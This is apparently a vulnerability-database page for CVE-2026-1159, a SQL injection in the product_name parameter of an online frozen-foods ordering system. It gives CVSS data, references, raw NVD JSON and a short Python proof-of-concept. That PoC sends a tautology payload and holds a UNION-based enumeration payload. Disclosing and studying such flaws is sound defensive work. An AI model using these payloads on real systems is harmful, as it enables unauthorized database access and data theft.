CVE-2026-1159

Description

A weakness has been identified in itsourcecode Online Frozen Foods Ordering System 1.0. This issue affects some unknown processing of the file /order_online.php. Executing a manipulation of the argument product_name can lead to sql injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:adonesevangelista:online_frozen_foods_ordering_system:1.0:*:*:*:*:*:*:* - VULNERABLE

itsourcecode Online Frozen Foods Ordering System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-1159 SQL Injection PoC
# Target: itsourcecode Online Frozen Foods Ordering System 1.0
# File: /order_online.php
# Parameter: product_name

def exploit_sqli(target_url):
    """
    SQL Injection PoC for CVE-2026-1159
    This demonstrates the vulnerability in product_name parameter
    """
    endpoint = f"{target_url}/order_online.php"
    
    # Basic authentication bypass payload
    payload = "' OR '1'='1"
    
    data = {
        'product_name': payload,
        'submit': 'Submit'
    }
    
    print(f"[*] Target: {endpoint}")
    print(f"[*] Payload: {payload}")
    
    try:
        response = requests.post(endpoint, data=data, timeout=10)
        print(f"[+] Response Status: {response.status_code}")
        
        # Check for SQL error indicators
        if 'sql' in response.text.lower() or 'mysql' in response.text.lower():
            print("[!] Potential SQL injection detected!")
            print("[*] Response snippet:", response.text[:500])
        else:
            print("[*] No obvious SQL errors in response")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

# UNION-based payload for database enumeration
def union_payload():
    """
    Example UNION-based SQL injection payload
    """
    return "' UNION SELECT NULL,NULL,version(),database(),NULL-- -"

if __name__ == "__main__":
    if len(sys.argv) > 1:
        exploit_sqli(sys.argv[1])
    else:
        print("Usage: python cve-2026-1159.py <target_url>")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1159
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1159
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1159/
[4] VulDB https://vuldb.com/cve/CVE-2026-1159
[5] https://github.com/YouSeeYouOneDayDayDe/Nick_1321_vuls/issues/1
[6] https://itsourcecode.com/
[7] https://vuldb.com/?ctiid.341753
[8] https://vuldb.com/?id.341753
[9] https://vuldb.com/?submit.736332

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1159", "sourceIdentifier": "[email protected]", "published": "2026-01-19T15:15:50.513", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in itsourcecode Online Frozen Foods Ordering System 1.0. This issue affects some unknown processing of the file /order_online.php. Executing a manipulation of the argument product_name can lead to sql injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks."}, {"lang": "es", "value": "Se ha identificado una debilidad en itsourcecode Online Frozen Foods Ordering System 1.0. Este problema afecta algún procesamiento desconocido del archivo /order_online.php. La ejecución de una manipulación del argumento product_name puede llevar a una inyección SQL. El ataque puede lanzarse de forma remota. El exploit se ha puesto a disposición del público y podría usarse para ataques."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adonesevangelista:online_frozen_foods_ordering_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "DABEDB4F-8EAF-478A-86B3-393DB7E58022"}]}]}], "references": [{"url": "https://github.com/YouSeeYouOneDayDayDe/Nick_1321_vuls/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation", "Vendor Advisory"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.341753", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb. ... (truncated)